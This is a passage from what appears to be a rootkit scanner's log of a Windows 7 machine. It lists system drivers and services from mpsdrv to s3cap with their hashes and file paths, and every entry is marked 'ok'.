09:28:13.0862 0x0a3c  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
09:28:13.0867 0x0a3c  mpsdrv - ok
09:28:13.0946 0x0a3c  [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
09:28:13.0995 0x0a3c  MpsSvc - ok
09:28:14.0041 0x0a3c  [ 21F4B24ACFC79A483515BD986DD9043F, 22681907E02E0B723ABE2CEF0602D36C8EF862E7E2B62A9B40A5EF582E58D7BA ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
09:28:14.0049 0x0a3c  MRxDAV - ok
09:28:14.0088 0x0a3c  [ 5D16C921E3671636C0EBA3BBAAC5FD25, 5BC107B95CAFC88F51FBB9F657B99944B20627A2B618F263093D7045E4FFD65C ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
09:28:14.0095 0x0a3c  mrxsmb - ok
09:28:14.0130 0x0a3c  [ 6D17A4791ACA19328C685D256349FEFC, 012AA3D84EEAAF53780D06D2D11B9727DFC3441F3FAD75BC9E751FB814403668 ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
09:28:14.0142 0x0a3c  mrxsmb10 - ok
09:28:14.0166 0x0a3c  [ B81F204D146000BE76651A50670A5E9E, 78193D0F967BE9829E53F9B500342934B4B1E1F4CEFC444382959E2061BC3B17 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
09:28:14.0172 0x0a3c  mrxsmb20 - ok
09:28:14.0207 0x0a3c  [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
09:28:14.0210 0x0a3c  msahci - ok
09:28:14.0241 0x0a3c  [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
09:28:14.0249 0x0a3c  msdsm - ok
09:28:14.0279 0x0a3c  [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
09:28:14.0292 0x0a3c  MSDTC - ok
09:28:14.0351 0x0a3c  [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
09:28:14.0353 0x0a3c  Msfs - ok
09:28:14.0373 0x0a3c  [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
09:28:14.0375 0x0a3c  mshidkmdf - ok
09:28:14.0405 0x0a3c  [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
09:28:14.0407 0x0a3c  msisadrv - ok
09:28:14.0454 0x0a3c  [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
09:28:14.0464 0x0a3c  MSiSCSI - ok
09:28:14.0475 0x0a3c  msiserver - ok
09:28:14.0510 0x0a3c  [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
09:28:14.0513 0x0a3c  MSKSSRV - ok
09:28:14.0578 0x0a3c  [ 1EE3643D1AA747222427F63353611AD7, 18465E375485DF4E980121449077D5BA87C25C5FA8D86F40DA3B7BE153306766 ] MsMpSvc         c:\Program Files\Microsoft Security Client\MsMpEng.exe
09:28:14.0581 0x0a3c  MsMpSvc - ok
09:28:14.0602 0x0a3c  [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
09:28:14.0605 0x0a3c  MSPCLOCK - ok
09:28:14.0617 0x0a3c  [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
09:28:14.0624 0x0a3c  MSPQM - ok
09:28:14.0652 0x0a3c  [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
09:28:14.0661 0x0a3c  MsRPC - ok
09:28:14.0696 0x0a3c  [ FC6B9FF600CC585EA38B12589BD4E246, F05DB01AE1955D2468CE6B51E51998B111CA3B0BDEED090EE6B99B625CBA564A ] mssmbios        C:\Windows\system32\drivers\mssmbios.sys
09:28:14.0699 0x0a3c  mssmbios - ok
09:28:14.0774 0x0a3c  MSSQL$ISSSQL - ok
09:28:14.0841 0x0a3c  [ 8E8E74C953EB0C4F8828D99D6F27FD6F, 94AFB1B09A6E92302D29B3C563B1744CECC5F5487418962BE537B7C57717CA42 ] MSSQLServerADHelper100 C:\Program Files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE
09:28:14.0845 0x0a3c  MSSQLServerADHelper100 - ok
09:28:14.0887 0x0a3c  [ B42C6B921F61A6E55159B8BE6CD54A36, 6BB0A7BE005B8F281E551D1B8046CE4202372BC7AE0161881C858BFAC675FE1C ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
09:28:14.0890 0x0a3c  MSTEE - ok
09:28:14.0926 0x0a3c  [ 33599130F44E1F34631CEA241DE8AC84, E15B31D1AFDC8DC6D2B21D4215796A99ECC69EEDBB06CEED01AECC3C99A44C8B ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
09:28:14.0928 0x0a3c  MTConfig - ok
09:28:14.0954 0x0a3c  [ 159FAD02F64E6381758C990F753BCC80, E55AB01DCFA95ECAB24A2A9656E28FF9D064BA08B3D82DC8AA42F5991BA09598 ] Mup             C:\Windows\system32\Drivers\mup.sys
09:28:14.0958 0x0a3c  Mup - ok
09:28:15.0011 0x0a3c  [ 61D57A5D7C6D9AFE10E77DAE6E1B445E, D252248532142E9E2332DA693BC51B795102CA938B568FF04981E98B19BFBC5C ] napagent        C:\Windows\system32\qagentRT.dll
09:28:15.0078 0x0a3c  napagent - ok
09:28:15.0126 0x0a3c  [ 26384429FCD85D83746F63E798AB1480, 957C115C263A4B4DC854558B43ECE632D8E2BCCB744E23A01EBA7476BA2E7FFB ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
09:28:15.0149 0x0a3c  NativeWifiP - ok
09:28:15.0218 0x0a3c  [ 8C9C922D71F1CD4DEF73F186416B7896, 15FF43CD90C7913F83B35F2E7986561584588E8A45196EBD965C3A355836A9C7 ] NDIS            C:\Windows\system32\drivers\ndis.sys
09:28:15.0264 0x0a3c  NDIS - ok
09:28:15.0299 0x0a3c  [ 0E1787AA6C9191D3D319E8BAFE86F80C, F535022747355B2C66424BDA892D7DCB820C2EB8EE05BAE5BC6D1B1D65186278 ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
09:28:15.0302 0x0a3c  NdisCap - ok
09:28:15.0342 0x0a3c  [ E4A8AEC125A2E43A9E32AFEEA7C9C888, 6EA181117126FC70B3C1DD1AC73CC26D1603A2CF49E47F66623E2C9489C49B55 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
09:28:15.0345 0x0a3c  NdisTapi - ok
09:28:15.0366 0x0a3c  [ D8A65DAFB3EB41CBB622745676FCD072, 874D3C3D247C4A309DA813DB1D2EDB0037D3C489824BD5FE95B0C20699764EF7 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
09:28:15.0370 0x0a3c  Ndisuio - ok
09:28:15.0405 0x0a3c  [ 38FBE267E7E6983311179230FACB1017, CFD1CBCA59650795C030DB30E5795B37C11C736E14003AE1DAB081BA5C0C9B14 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
09:28:15.0412 0x0a3c  NdisWan - ok
09:28:15.0436 0x0a3c  [ A4BDC541E69674FBFF1A8FF00BE913F2, 18CCFD063E9870B8B6958715BC0414C4D920AE63528EA1E9D7E30F7138918FFA ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
09:28:15.0441 0x0a3c  NDProxy - ok
09:28:15.0464 0x0a3c  [ 80B275B1CE3B0E79909DB7B39AF74D51, 75B406B0D9D28239D4EB2A298419A5F78A58237D88C5FD688EF1DFFAFACCF796 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
09:28:15.0467 0x0a3c  NetBIOS - ok
09:28:15.0498 0x0a3c  [ 280122DDCF04B378EDD1AD54D71C1E54, F98B2ADE34F7E67C7C06C1D0FFB80ECBC353D044D4B4784CD952910345DC2ED0 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
09:28:15.0508 0x0a3c  NetBT - ok
09:28:15.0526 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] Netlogon        C:\Windows\system32\lsass.exe
09:28:15.0532 0x0a3c  Netlogon - ok
09:28:15.0586 0x0a3c  [ 7CCCFCA7510684768DA22092D1FA4DB2, BB9E4F8FABBF596D888E6D303CB54A336D9DFF95B36AEA9369D2ED787DDC4B5D ] Netman          C:\Windows\System32\netman.dll
09:28:15.0620 0x0a3c  Netman - ok
09:28:15.0656 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0678 0x0a3c  NetMsmqActivator - ok
09:28:15.0697 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0705 0x0a3c  NetPipeActivator - ok
09:28:15.0760 0x0a3c  [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] netprofm        C:\Windows\System32\netprofm.dll
09:28:15.0817 0x0a3c  netprofm - ok
09:28:15.0836 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0845 0x0a3c  NetTcpActivator - ok
09:28:15.0864 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0872 0x0a3c  NetTcpPortSharing - ok
09:28:15.0917 0x0a3c  [ 1D85C4B390B0EE09C7A46B91EFB2C097, 6A8850B151E88EE371F3CC543A946302DDF9494908D684B8B0C706A42CC54348 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
09:28:15.0921 0x0a3c  nfrd960 - ok
09:28:15.0967 0x0a3c  [ FCBC2F48430EB0D7150A6521C0B84ACA, EEFB975E2D1121EE9E93702F2CA2938C99C6B2273616C85816BA15E857E8D4FF ] NisDrv          C:\Windows\system32\DRIVERS\NisDrvWFP.sys
09:28:15.0974 0x0a3c  NisDrv - ok
09:28:16.0015 0x0a3c  [ E4AA07F8BCBCB66EF115C443CD45C7A2, 3B538D9E376F12FC8589BA500BB5E859337CF1856D0E4AA66E2E3B5E301DAEC5 ] NisSrv          c:\Program Files\Microsoft Security Client\NisSrv.exe
09:28:16.0038 0x0a3c  NisSrv - ok
09:28:16.0080 0x0a3c  [ 374071043F9E4231EE43BE2BB48DD36D, C4FA3FC40CC49DBBB91901D14210A55D3831FAC9F9B3FF45FCA7F5CF242C9E92 ] NlaSvc          C:\Windows\System32\nlasvc.dll
09:28:16.0113 0x0a3c  NlaSvc - ok
09:28:16.0146 0x0a3c  [ 1DB262A9F8C087E8153D89BEF3D2235F, A51EE5D5AD3CD76B74BEA9C66C462608BF3B50C53DAA4110A75DB10495A8C101 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
09:28:16.0149 0x0a3c  Npfs - ok
09:28:16.0187 0x0a3c  [ BA387E955E890C8A88306D9B8D06BF17, 3477BD9686C5777A93251C154512671AAA7533B18C536DF51F7B1D6D28E7F8A5 ] nsi             C:\Windows\system32\nsisvc.dll
09:28:16.0194 0x0a3c  nsi - ok
09:28:16.0215 0x0a3c  [ E9A0A4D07E53D8FEA2BB8387A3293C58, 690CAD6C4E35ECC1172A2E1FD3933DF73158B3BF42CB21244269612A53DE4D7A ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
09:28:16.0218 0x0a3c  nsiproxy - ok
09:28:16.0329 0x0a3c  [ C8DFF8D07755A66C7A4A738930F0FEAC, A2CC58312CE57988ABD976155BE91F558DCEC4C23481C6FBE64B361D511A36EA ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
09:28:16.0407 0x0a3c  Ntfs - ok
09:28:16.0429 0x0a3c  [ F9756A98D69098DCA8945D62858A812C, 572ADBFCFDE2030B34A013AADC14DBC144EB3F34D06991E2464A3EA9605BC045 ] Null            C:\Windows\system32\drivers\Null.sys
09:28:16.0432 0x0a3c  Null - ok
09:28:16.0473 0x0a3c  [ B3E25EE28883877076E0E1FF877D02E0, 402B6FED6FBBF645190396DC141141EF52DD059DABD01F8AC9CF01D23664070C ] nvraid          C:\Windows\system32\drivers\nvraid.sys
09:28:16.0480 0x0a3c  nvraid - ok
09:28:16.0513 0x0a3c  [ 4380E59A170D88C4F1022EFF6719A8A4, 93EDB3F4CDBF53C9C1970DD29AB146E390695C568180847BA8903F5FBEABCFF2 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
09:28:16.0523 0x0a3c  nvstor - ok
09:28:16.0572 0x0a3c  [ 5A0983915F02BAE73267CC2A041F717D, D83461D74597BF2BE042FEFCC27FCD18BF63CB8135B0666D731D50951C3468A8 ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
09:28:16.0579 0x0a3c  nv_agp - ok
09:28:16.0609 0x0a3c  [ 08A70A1F2CDDE9BB49B885CB817A66EB, 0BB98123B544124B144F3E95D77E01E973D060B8B2302503FF24ABBBE803EB63 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
09:28:16.0614 0x0a3c  ohci1394 - ok
09:28:16.0663 0x0a3c  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
09:28:16.0697 0x0a3c  p2pimsvc - ok
09:28:16.0743 0x0a3c  [ 59C3DDD501E39E006DAC31BF55150D91, E02B63AB7F34CF6FF3F644AF354D10004E6F50014E03172D80BD78934EF71EF1 ] p2psvc          C:\Windows\system32\p2psvc.dll
09:28:16.0778 0x0a3c  p2psvc - ok
09:28:16.0820 0x0a3c  [ 2EA877ED5DD9713C5AC74E8EA7348D14, 14BA3722CE5F8FF07F2D97DCDD6558EB49C9B02E5E6FAD6D9F18D354733EFECE ] Parport         C:\Windows\system32\drivers\parport.sys
09:28:16.0826 0x0a3c  Parport - ok
09:28:16.0865 0x0a3c  [ 3F34A1B4C5F6475F320C275E63AFCE9B, 31295D5121C0C3F2085E0EEBA260EEE4CA003993C026E2F81986D19158036E6B ] partmgr         C:\Windows\system32\drivers\partmgr.sys
09:28:16.0869 0x0a3c  partmgr - ok
09:28:16.0885 0x0a3c  [ EB0A59F29C19B86479D36B35983DAADC, AC09AFE7F13BE4079D01383BAC44091997E1AAF6512C9673A42B9E3780EB08A8 ] Parvdm          C:\Windows\system32\drivers\parvdm.sys
09:28:16.0887 0x0a3c  Parvdm - ok
09:28:16.0915 0x0a3c  [ 358AB7956D3160000726574083DFC8A6, 6CAFD4D1B8AB8C1D167ADC018985DDAB5AC2CBFFB3434FE6390F14AF50C19025 ] PcaSvc          C:\Windows\System32\pcasvc.dll
09:28:16.0929 0x0a3c  PcaSvc - ok
09:28:16.0974 0x0a3c  [ 673E55C3498EB970088E812EA820AA8F, 1F81315664B8CBFDD569416C0ECCE4C6251F34577313A0858AB46609781303B5 ] pci             C:\Windows\system32\drivers\pci.sys
09:28:16.0982 0x0a3c  pci - ok
09:28:17.0015 0x0a3c  [ AFE86F419014DB4E5593F69FFE26CE0A, CAF36E61BE7B511D3A03A65FF5A3017CEE4D2F53005B410F2D4A2AAE9FED4C00 ] pciide          C:\Windows\system32\drivers\pciide.sys
09:28:17.0018 0x0a3c  pciide - ok
09:28:17.0058 0x0a3c  [ F396431B31693E71E8A80687EF523506, BC614FC21E029E2497F1CCE3131BBD295B827F2310762B47D5BBC7703D80554B ] pcmcia          C:\Windows\system32\drivers\pcmcia.sys
09:28:17.0070 0x0a3c  pcmcia - ok
09:28:17.0093 0x0a3c  [ 250F6B43D2B613172035C6747AEEB19F, A91F15B133F2619912CF750E6F3662E011CD0FA4B9477CE532CE3196D23307D9 ] pcw             C:\Windows\system32\drivers\pcw.sys
09:28:17.0097 0x0a3c  pcw - ok
09:28:17.0152 0x0a3c  [ 9E0104BA49F4E6973749A02BF41344ED, B32F39F38DB48D77FBA884DEE34112BAB81CCEF5DD2EAAA12D9589D73D2BB116 ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
09:28:17.0198 0x0a3c  PEAUTH - ok
09:28:17.0294 0x0a3c  [ AF4D64D2A57B9772CF3801950B8058A6, C9C493A3775E6E1660CE5DF75DA574D0C04245FB88CF41B96217A725359C350D ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
09:28:17.0366 0x0a3c  PeerDistSvc - ok
09:28:17.0524 0x0a3c  [ 414BBA67A3DED1D28437EB66AEB8A720, D6DF254E2615FA402044824DCD9004F579FC0DF74B90E44C99D5F0253CF8AD88 ] pla             C:\Windows\system32\pla.dll
09:28:17.0626 0x0a3c  pla - ok
09:28:17.0694 0x0a3c  [ EC7BC28D207DA09E79B3E9FAF8B232CA, A42F8F69C3CD753D787A5D558659DEA2CC306C896D75B8C82549219CF654504F ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
09:28:17.0739 0x0a3c  PlugPlay - ok
09:28:17.0767 0x0a3c  [ 63FF8572611249931EB16BB8EED6AFC8, 9732CCBCB93A7A4BEC88812B952C20244479E9BD781240C195E57F09E619EA33 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
09:28:17.0775 0x0a3c  PNRPAutoReg - ok
09:28:17.0804 0x0a3c  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
09:28:17.0823 0x0a3c  PNRPsvc - ok
09:28:17.0874 0x0a3c  [ 53946B69BA0836BD95B03759530C81EC, 7F14A34635354CCA0F5342C8D9DF5A6AA1B94F6A508BD8834029E9BACF252920 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
09:28:17.0920 0x0a3c  PolicyAgent - ok
09:28:17.0956 0x0a3c  [ F87D30E72E03D579A5199CCB3831D6EA, B09328E89954584F97908FA5946376BA990B8C650DABCBF3CA3B08719937C694 ] Power           C:\Windows\system32\umpo.dll
09:28:17.0970 0x0a3c  Power - ok
09:28:18.0046 0x0a3c  [ 631E3E205AD6D86F2AED6A4A8E69F2DB, 1D3BF0CFC37D91A3A56246920B9CF1084E78A055D56E85A773417809C58C8065 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
09:28:18.0052 0x0a3c  PptpMiniport - ok
09:28:18.0097 0x0a3c  [ 85B1E3A0C7585BC4AAE6899EC6FCF011, 1E067113C146D6842D7FB04007F363D6FB7783C6BC7C9AB6614E44075C4F86C3 ] Processor       C:\Windows\system32\drivers\processr.sys
09:28:18.0102 0x0a3c  Processor - ok
09:28:18.0145 0x0a3c  [ CADEFAC453040E370A1BDFF3973BE00D, 2E3DD8DA702468D8AB0F3CE27188B1991D4CB015FB36BAE4C6E7996B61CF49B8 ] ProfSvc         C:\Windows\system32\profsvc.dll
09:28:18.0178 0x0a3c  ProfSvc - ok
09:28:18.0204 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] ProtectedStorage C:\Windows\system32\lsass.exe
09:28:18.0209 0x0a3c  ProtectedStorage - ok
09:28:18.0320 0x0a3c  [ AB95ECF1F6659A60DDC166D8315B0751, 0ED6D3460D28978BADF31B930DBB3298A6A10EFF8883763EABA0E36A21A0E83D ] ql2300          C:\Windows\system32\drivers\ql2300.sys
09:28:18.0414 0x0a3c  ql2300 - ok
09:28:18.0464 0x0a3c  [ B4DD51DD25182244B86737DC51AF2270, 7E62B04F054A6330B7F9968222523BDE8F3EE47A11D17E6C0E2D5ACDC07B9E6B ] ql40xx          C:\Windows\system32\drivers\ql40xx.sys
09:28:18.0471 0x0a3c  ql40xx - ok
09:28:18.0529 0x0a3c  [ 31AC809E7707EB580B2BDB760390765A, A8481FD19A0F778F5591B7676F591F664ADC68B6867E663C0F9564173F4AC909 ] QWAVE           C:\Windows\system32\qwave.dll
09:28:18.0570 0x0a3c  QWAVE - ok
09:28:18.0611 0x0a3c  [ 584078CA1B95CA72DF2A27C336F9719D, 836F115C92D343463C14A9DE39648C1EFA7C7EE4720F5C692EE0F68B84830121 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
09:28:18.0615 0x0a3c  QWAVEdrv - ok
09:28:18.0657 0x0a3c  [ B953369C5EF43615F1BFA9CEA69FC9AA, 3094E50FBBEF7582F67E1E0BF255F29774A9C9D4E1986718F103AE5344B1031E ] radpms          C:\Windows\system32\DRIVERS\radpms.sys
09:28:18.0659 0x0a3c  radpms - ok
09:28:18.0679 0x0a3c  [ 30A81B53C766D0133BB86D234E5556AB, 726C6B83B5ACAA84CAB1689B6DD6DDAE3199D61A57B5D7B5B5A0F62FCF838090 ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
09:28:18.0684 0x0a3c  RasAcd - ok
09:28:18.0726 0x0a3c  [ 57EC4AEF73660166074D8F7F31C0D4FD, C66B425EC4DB5E7FD289AE631C9B019EB16717C55E80FAE964BB22203E4AACEF ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
09:28:18.0731 0x0a3c  RasAgileVpn - ok
09:28:18.0768 0x0a3c  [ A60F1839849C0C00739787FD5EC03F13, B210DFA5A843CF1DA73635F168E2EA5052CBED15C664F8523CDFB34CA165D0E0 ] RasAuto         C:\Windows\System32\rasauto.dll
09:28:18.0780 0x0a3c  RasAuto - ok
09:28:18.0825 0x0a3c  [ D9F91EAFEC2815365CBE6D167E4E332A, 8350457A39D141C13807E7DB5A8D4113197C4016F7744B9993391F4AEA0C4A5C ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
09:28:18.0830 0x0a3c  Rasl2tp - ok
09:28:18.0874 0x0a3c  [ CB9E04DC05EACF5B9A36CA276D475006, 4D8C0AEF1D4F84F375AD2BAF786C9F6C52316A3E655B913449E71AD7C0FCA56E ] RasMan          C:\Windows\System32\rasmans.dll
09:28:18.0919 0x0a3c  RasMan - ok
09:28:18.0947 0x0a3c  [ 0FE8B15916307A6AC12BFB6A63E45507, 64119474DE7499E6E8B82E78BBD50074B3AA70B3E8329089FAE9B7F29919004E ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
09:28:18.0954 0x0a3c  RasPppoe - ok
09:28:18.0996 0x0a3c  [ 44101F495A83EA6401D886E7FD70096B, 56A0CE5C89870752B9B2AB795C1A248CA28209E049B2F20CCA0308CBE2488A0A ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
09:28:19.0002 0x0a3c  RasSstp - ok
09:28:19.0036 0x0a3c  [ D528BC58A489409BA40334EBF96A311B, C71E9A4B101DB6C3183B9F97B9098D73D6FE1B12C05C2EB3CE8A8041BEE6BA61 ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
09:28:19.0056 0x0a3c  rdbss - ok
09:28:19.0083 0x0a3c  [ 0D8F05481CB76E70E1DA06EE9F0DA9DF, 2AFCBE3237D27AFBF095F91F1FCCA63E6890F34A9E4F00E5C34C92394CDA89FB ] rdpbus          C:\Windows\system32\drivers\rdpbus.sys
09:28:19.0086 0x0a3c  rdpbus - ok
09:28:19.0112 0x0a3c  [ 23DAE03F29D253AE74C44F99E515F9A1, 8FED93D10B2062F0526FE3508101F8FCF8F72DEB90AFB472EB7CBAE83A0EC430 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
09:28:19.0118 0x0a3c  RDPCDD - ok
09:28:19.0159 0x0a3c  [ B973FCFC50DC1434E1970A146F7E3885, BE797E5F5AE34D37F8DA1134CE94DD14DBE36D2BC405B97E992E2257848B7CA9 ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
09:28:19.0168 0x0a3c  RDPDR - ok
09:28:19.0191 0x0a3c  [ 5A53CA1598DD4156D44196D200C94B8A, 8112FE14FEC94C67B1C5BDE4171E37584F1D0098D2C557C9E4BDD3E0291E25E4 ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
09:28:19.0195 0x0a3c  RDPENCDD - ok
09:28:19.0226 0x0a3c  [ 44B0A53CD4F27D50ED461DAE0C0B4E1F, CDA80B08E67AD034081C0C920CD66147689F1844403CBC552F65005E7C011A91 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
09:28:19.0229 0x0a3c  RDPREFMP - ok
09:28:19.0264 0x0a3c  [ 65375DF758CA1872AB7EBBBA457FD5E6, 8AC7681F51277E799C22FF95FA0B833E9E260D37C0416319FF05B66FB3948005 ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
09:28:19.0268 0x0a3c  RdpVideoMiniport - ok
09:28:19.0312 0x0a3c  [ F031683E6D1FEA157ABB2FF260B51E61, 83B552819A5964152882C527E1421DBCEAACC74DEB897E3C4B53F52F1467FED3 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
09:28:19.0323 0x0a3c  RDPWD - ok
09:28:19.0368 0x0a3c  [ 518395321DC96FE2C9F0E96AC743B656, 5F6A0880B4F3EE7196259EA362DA9554B0687B0236F9A8E5CF7A4A77F01F1776 ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
09:28:19.0383 0x0a3c  rdyboost - ok
09:28:19.0422 0x0a3c  [ 7B5E1419717FAC363A31CC302895217A, 048B96B127CC20833948DAE53C59886D5C725ECA7A744424A01339447D2DDC32 ] RemoteAccess    C:\Windows\System32\mprdim.dll
09:28:19.0432 0x0a3c  RemoteAccess - ok
09:28:19.0466 0x0a3c  [ CB9A8683F4EF2BF99E123D79950D7935, B9FA3E7E91E76D975CF40BFA37909E50F29CC13AB1399007884710651827E9AA ] RemoteRegistry  C:\Windows\system32\regsvc.dll
09:28:19.0479 0x0a3c  RemoteRegistry - ok
09:28:19.0516 0x0a3c  [ 78D072F35BC45D9E4E1B61895C152234, 80C924EE1156B4E3172E83DCB9C60817E87885FB9377647E0BF90153E415B1CA ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
09:28:19.0525 0x0a3c  RpcEptMapper - ok
09:28:19.0553 0x0a3c  [ 94D36C0E44677DD26981D2BFEEF2A29D, D77A93AC60536F3706E8A0154C0C2199E888B7748C84DB7437254FF175F4DF55 ] RpcLocator      C:\Windows\system32\locator.exe
09:28:19.0560 0x0a3c  RpcLocator - ok
09:28:19.0609 0x0a3c  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] RpcSs           C:\Windows\system32\rpcss.dll
09:28:19.0635 0x0a3c  RpcSs - ok
09:28:19.0693 0x0a3c  [ 83FEEC49C4FCA310EA951F84A83161FF, F137F6438E58CB9236F38818D1A10D2F5A7BFC7C3951CD17F1E3C20DFFE203B6 ] RsFx0153        C:\Windows\system32\DRIVERS\RsFx0153.sys
09:28:19.0717 0x0a3c  RsFx0153 - ok
09:28:19.0779 0x0a3c  [ F83FEAF4C5A3A559A6CC98E112B62744, E679C71B37D913B9534EA7F96611157F782787FCC5798B1D05855624754E3FF2 ] RTL8167         C:\Windows\system32\DRIVERS\Rt86win7.sys
09:28:19.0813 0x0a3c  RTL8167 - ok
09:28:19.0848 0x0a3c  [ 7FA7F2E249A5DCBB7970630E15E1F482, 9633B193F3FDA67BC551C6DCA4788AB83E9F45F77763EE579D02FE5D6B80DEDF ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
09:28:19.0851 0x0a3c  s3cap - ok
